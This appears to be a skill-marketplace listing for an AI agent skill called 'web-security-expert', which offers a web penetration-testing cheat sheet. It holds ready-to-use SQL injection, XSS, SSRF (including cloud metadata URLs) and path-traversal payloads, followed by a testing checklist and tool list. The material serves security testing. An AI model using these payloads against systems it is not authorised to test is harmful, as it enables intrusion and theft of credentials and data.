スキル一覧に戻る
ripgraphics

web-security-expert

by ripgraphics

New Author's Info Project

0🍴 0📅 2026年1月25日
GitHubで見るManusで実行

SKILL.md


name: web-security-expert description: >- Web application security expert. OWASP Top 10, XSS, SQLi, CSRF, SSRF, authentication bypass, IDOR. Use for web app security testing.

Web Security Expert

OWASP Top 10 Quick Reference

VulnTestPayload Example
SQLi', ", 1 OR 1=1' UNION SELECT null,username,password FROM users--
XSS<script>, event handlers<img src=x onerror=alert(1)>
SSRFInternal URLshttp://127.0.0.1, http://169.254.169.254
IDORChange IDs/api/user/123/api/user/124
LFIPath traversal../../../etc/passwd
RCECommand chars; id, `

Testing Checklist

Authentication

  • Brute force protection
  • Password reset flaws
  • Session fixation
  • JWT vulnerabilities

Authorization

  • IDOR on all endpoints
  • Privilege escalation
  • Missing function level access

Input Validation

  • SQLi all parameters
  • XSS reflected/stored
  • Command injection
  • File upload bypass

Quick Payloads

# SQLi
' OR '1'='1
' UNION SELECT null,null,null--
'; WAITFOR DELAY '0:0:5'--

# XSS
<script>alert(document.domain)</script>
<img src=x onerror=alert(1)>
javascript:alert(1)

# SSRF
http://127.0.0.1:80
http://[::]:80
http://169.254.169.254/latest/meta-data/

# LFI
....//....//....//etc/passwd
..%252f..%252f..%252fetc/passwd

Tools

PurposeTool
ProxyBurp Suite, OWASP ZAP
SQLisqlmap
XSSXSStrike, dalfox
Fuzzingffuf, wfuzz

スコア

総合スコア

60/100

リポジトリの品質指標に基づく評価

SKILL.md

SKILL.mdファイルが含まれている

+20
LICENSE

ライセンスが設定されている

+10
説明文

100文字以上の説明がある

0/10
人気

GitHub Stars 100以上

0/15
最近の活動

3ヶ月以内に更新がある

0/10
フォーク

10回以上フォークされている

0/5
Issue管理

オープンIssueが50未満

+5
言語

プログラミング言語が設定されている

+5
タグ

1つ以上のタグが設定されている

0/5

レビュー

💬

レビュー機能は近日公開予定です